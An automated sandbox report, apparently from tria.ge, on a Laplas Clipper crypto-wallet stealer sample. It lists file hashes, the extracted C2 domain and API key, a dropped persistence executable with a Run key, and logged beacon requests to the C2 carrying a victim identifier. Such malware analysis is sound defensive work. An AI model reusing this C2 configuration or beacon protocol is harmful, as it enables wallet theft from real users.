Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/07/2023, 01:27 UTC

General

  • Target

    4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe

  • Size

    1.8MB

  • MD5

    68732e21f497396296e93fb7277add61

  • SHA1

    1fdec6fc0ab4647491cb163a732d985bf6e75f16

  • SHA256

    4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e

  • SHA512

    b3b2deb42b8c1362642ac725f24a3fc59eade40da1bf5e9f2a66e634ab8f7e3ad75a3eee65003be6532b808ad299ec293a9ceae024217a5de68aa41b61134305

  • SSDEEP

    49152:ZxP1ZMKdnhkmr5VlkA/azDEPKkb89KTYkr3T6:H1v9ViA/wkg9KTZ3T

Malware Config

Extracted

Family

laplas

C2

http://clipper.guru

Attributes
  • api_key

    0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e

Extracted

Family

laplas

C2

http://clipper.guru

Attributes
  • api_key

    0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe
    "C:\Users\Admin\AppData\Local\Temp\4a1f597ed9fb89832e1182a9209d9a65453432e7a445e37c99cafd32963e429e.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Executes dropped EXE
      PID:4512

Network

  • flag-us
    DNS
    73.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.1.85.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.1.85.104.in-addr.arpa
    IN PTR
    Response
    198.1.85.104.in-addr.arpa
    IN PTR
    a104-85-1-198deploystaticakamaitechnologiescom
  • flag-us
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    clipper.guru
    ntlhost.exe
    Remote address:
    8.8.8.8:53
    Request
    clipper.guru
    IN A
    Response
    clipper.guru
    IN A
    185.209.161.61
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:28:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:28:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:29:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:29:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/regex HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:30:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    ntlhost.exe
    Remote address:
    185.209.161.61:80
    Request
    GET /bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 25 Jul 2023 01:30:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-us
    DNS
    61.161.209.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.161.209.185.in-addr.arpa
    IN PTR
    Response
    61.161.209.185.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    104.85.1.163
  • flag-nl
    GET
    http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt
    Remote address:
    104.85.1.163:80
    Request
    GET /pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1126
    Content-Type: application/octet-stream
    Content-MD5: YAUaFgF7vUODUG8XQQW6BQ==
    Last-Modified: Fri, 28 Sep 2018 22:50:05 GMT
    ETag: 0x8D62594BC0C84D8
    x-ms-request-id: 31bd8fcd-b01e-0028-1005-d530cf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Unused62: 8096267
    X-EdgeConnect-Origin-MEX-Latency: 117
    Date: Tue, 25 Jul 2023 01:28:39 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV1dbe2d93.0
    ms-cv-esi: CASMicrosoftCV1dbe2d93.0
    X-RTag: RT
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    163.1.85.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    163.1.85.104.in-addr.arpa
    IN PTR
    Response
    163.1.85.104.in-addr.arpa
    IN PTR
    a104-85-1-163deploystaticakamaitechnologiescom
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    161.252.72.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    161.252.72.23.in-addr.arpa
    IN PTR
    Response
    161.252.72.23.in-addr.arpa
    IN PTR
    a23-72-252-161deploystaticakamaitechnologiescom
  • flag-us
    DNS
    8.3.197.209.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.3.197.209.in-addr.arpa
    IN PTR
    Response
    8.3.197.209.in-addr.arpa
    IN PTR
    vip0x008map2sslhwcdnnet
  • flag-us
    DNS
    73.254.224.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.254.224.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    253.15.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.15.104.51.in-addr.arpa
    IN PTR
    Response
  • 185.209.161.61:80
    http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin
    http
    ntlhost.exe
    1.5kB
    3.6kB
    14
    16

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://clipper.guru/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=MSXGLQPS\Admin

    HTTP Response

    200
  • 104.85.1.163:80
    http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt
    http
    418 B
    1.8kB
    5
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/certs/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crt

    HTTP Response

    200
  • 8.8.8.8:53
    73.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    73.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    198.1.85.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    198.1.85.104.in-addr.arpa

  • 8.8.8.8:53
    208.194.73.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    208.194.73.20.in-addr.arpa

  • 8.8.8.8:53
    clipper.guru
    dns
    ntlhost.exe
    58 B
    74 B
    1
    1

    DNS Request

    clipper.guru

    DNS Response

    185.209.161.61

  • 8.8.8.8:53
    61.161.209.185.in-addr.arpa
    dns
    73 B
    86 B
    1
    1

    DNS Request

    61.161.209.185.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    104.85.1.163

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    163.1.85.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    163.1.85.104.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    161.252.72.23.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    161.252.72.23.in-addr.arpa

  • 8.8.8.8:53
    8.3.197.209.in-addr.arpa
    dns
    70 B
    111 B
    1
    1

    DNS Request

    8.3.197.209.in-addr.arpa

  • 8.8.8.8:53
    73.254.224.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    73.254.224.20.in-addr.arpa

  • 8.8.8.8:53
    253.15.104.51.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    253.15.104.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    593.6MB

    MD5

    a5b62feff7b3773f167cfa1598e657ae

    SHA1

    3131f8fc0854d0174e2d511f9a615da9de697fa3

    SHA256

    ccfe162b246bc3d9b867d0e97aca07dc9c0808b08cfdf545d189f0027de8d42f

    SHA512

    3227ecf1022b8e72474aca4f55c94aa4fd98dae31a01a8fea9da2d07f64798b5f22a7cfdcb16e6b8624f701a9dc7795e2e8f3099fc071dc1712f533f18c98b3a

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    519.2MB

    MD5

    534db06b1e6a69fa02884ad797860f32

    SHA1

    23924acd4b77fc6bf55761875ac33ce23ea987dd

    SHA256

    721ea543d4a35cd201aa0261305dfe2fba8725d1540f3fa4968691295fcbec50

    SHA512

    7bc0a67f84eb7f8f8ccb2c53966f20b036ef6122e8694abc54e12778eb9c8a8ee0aefa26fa25d5a0860f93c05d34f4e6ce9378eb3b865778f7cf0566cad41801

  • memory/1216-135-0x00000000042C0000-0x000000000446F000-memory.dmp

    Filesize

    1.7MB

  • memory/1216-136-0x00000000044A0000-0x0000000004870000-memory.dmp

    Filesize

    3.8MB

  • memory/1216-137-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/1216-139-0x00000000042C0000-0x000000000446F000-memory.dmp

    Filesize

    1.7MB

  • memory/1216-140-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/1216-141-0x00000000044A0000-0x0000000004870000-memory.dmp

    Filesize

    3.8MB

  • memory/1216-144-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-152-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-156-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-149-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-150-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-151-0x0000000004360000-0x0000000004511000-memory.dmp

    Filesize

    1.7MB

  • memory/4512-147-0x0000000004360000-0x0000000004511000-memory.dmp

    Filesize

    1.7MB

  • memory/4512-153-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-154-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-155-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-148-0x0000000004520000-0x00000000048F0000-memory.dmp

    Filesize

    3.8MB

  • memory/4512-157-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-159-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-160-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-161-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-162-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-163-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-164-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-165-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

  • memory/4512-166-0x0000000000400000-0x0000000002606000-memory.dmp

    Filesize

    34.0MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.